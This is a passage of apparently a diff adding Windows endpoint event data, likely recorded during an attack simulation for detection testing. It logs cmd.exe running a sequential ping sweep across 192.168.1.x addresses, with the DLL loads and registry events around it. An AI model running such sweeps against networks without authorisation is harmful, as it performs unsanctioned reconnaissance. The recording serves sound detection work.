"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 
6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "process", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572411840000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.89", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1748, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": 
"kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1748, + "process_name": "PING.EXE", 
+ "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "process", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572416990000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.90", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4832, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572417130000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417300000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417300000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417300000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "process", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572421830000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.91", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883572426369984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883572426369984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572426990000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.92", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3068, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + 
"unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427300000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427300000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427300000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "process", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572431830000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.93", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5088, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}", + 
"unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": 
"{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "process", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572436840000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.94", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4036, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572436980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, 
+ { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "process", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": 
